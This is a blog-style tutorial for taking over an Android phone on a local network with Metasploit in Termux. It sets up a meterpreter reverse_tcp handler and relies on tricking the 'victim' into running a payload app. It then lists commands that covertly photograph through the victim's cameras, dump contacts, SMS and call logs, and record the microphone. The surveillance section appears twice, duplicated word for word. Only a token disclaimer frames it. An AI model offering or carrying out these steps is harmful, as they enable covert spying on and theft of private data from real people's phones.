Hello Friends! I hope you are doing well. So, today's topic is How to hack Android Device on LAN by using Metasploit and Termux application.
Note: This post is for educational purposes only Do not try this on an individual phone. All the tests I have done on my own phone.
Devices and Tools:
- A non-rooted android phone with a 16GB microSD card connected to my wireless network.
- Termux Application in my Android Phone.
- Metasploit Framework.
- Another android Phone it will act as a Victim Phone.
Step By Step to Hack Android Phone on LAN:
#1. Go to the Termux Application.
#2. Got to the Metasploit Directory using Cd command
#3. Type msfconsole and wait for a few minutes to get a Metasploit screen
#4. use exploit/multi/handler
I am running exploit for the multi/handler and execute our generated executable on the victim. The multi/handler handles the exploit for us and presents us with our shell.
Read Also: How to hack WIFI password using WiFi Phisher in Kali Linux
#5. Set the reverse TCP android payload:
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.20 lhost => 192.168.0.20
192.168.0.20 address is your phone IP address. Make sure when you are creating a payload type the LHOST= < your IP address >
You can check my post of creating a payload in Metasploit which is the first part of this post. Without reading that post it will be difficult for you to understand this post.
You can check my post of creating a payload in Metasploit which is the first part of this post. Without reading that post it will be difficult for you to understand this post.
msf exploit(handler) > set lport 4444
lport => 4444
#8. Exploit
Now that you have a session open. Make sure the user clicks on the application/payload that you have made it for them and then you can begin with meterpreter.
HACKING COMMANDS:-
Thus, you have got full access control to your Victim’s mobile. you'll be able to enter: command, for all the out there commands available to you for hacking. however, I'll try this for you we will use these below commands for hacking:-
#1 Controlling the Victim’s Camera
Controlling the Victim’s Camera Firstly, to capture the picture from Front-Camera of Victim’s phone simply type this command:-
webcam_snap -i 2 -p storage/downloads/images232-F.jpg
Secondly,
If you wish to access back camera of Victim’s phone simply replace two within the previous command by one
webcam_snap -i 1 -p storage/downloads/image20200101.jpg
You can checkout your gallery or file manager(by default within the transfer folder) to envision the image captured by your Victim’s phone.
#2. obtaining all contacts from Victim’s phone
For accessing contacts from your Victim’s phone simply type this command:-
dump_contacts -o storage/downloads/Contacts.txt
A list of contacts is saved in your download folder particularly Contacts.txt.
#3. To access SMS from Victim’s phone
To scan all SMS from Victim’s phone similar to on top of type this command:-
dump_sms -o storage/downloads/SMS.txt
All the messages can by default get a hold on in your downloads folder particularly SMS.txt
#4. Fetching Call Logs
To get the call log details of your Victim’s android phone
dump_calllog -o storage/downloads/CallLog.txt
All the decision log details can by default get a hold on in your downloads folder particularly CallLog.txt
5. Accessing the recording files of the Victim’s phone
You can conjointly record audio through the Victim’s phone and listen to it on your phone. simply type this command:-
record_mic -d 10 -f storage/downloads/Spy-Record.mp3
By default, this command can record 10 seconds of audio.
You can modify the length of recording simply replace 10 by the time that you simply need like twenty for 20 seconds recording so on.
webcam_snap -i 2 -p storage/downloads/images232-F.jpg
Secondly,
If you wish to access back camera of Victim’s phone simply replace two within the previous command by one
webcam_snap -i 1 -p storage/downloads/image20200101.jpg
You can checkout your gallery or file manager(by default within the transfer folder) to envision the image captured by your Victim’s phone.
#2. obtaining all contacts from Victim’s phone
For accessing contacts from your Victim’s phone simply type this command:-
dump_contacts -o storage/downloads/Contacts.txt
A list of contacts is saved in your download folder particularly Contacts.txt.
#3. To access SMS from Victim’s phone
To scan all SMS from Victim’s phone similar to on top of type this command:-
dump_sms -o storage/downloads/SMS.txt
All the messages can by default get a hold on in your downloads folder particularly SMS.txt
#4. Fetching Call Logs
To get the call log details of your Victim’s android phone
dump_calllog -o storage/downloads/CallLog.txt
All the decision log details can by default get a hold on in your downloads folder particularly CallLog.txt
5. Accessing the recording files of the Victim’s phone
You can conjointly record audio through the Victim’s phone and listen to it on your phone. simply type this command:-
record_mic -d 10 -f storage/downloads/Spy-Record.mp3
By default, this command can record 10 seconds of audio.
You can modify the length of recording simply replace 10 by the time that you simply need like twenty for 20 seconds recording so on.
No comments:
Post a Comment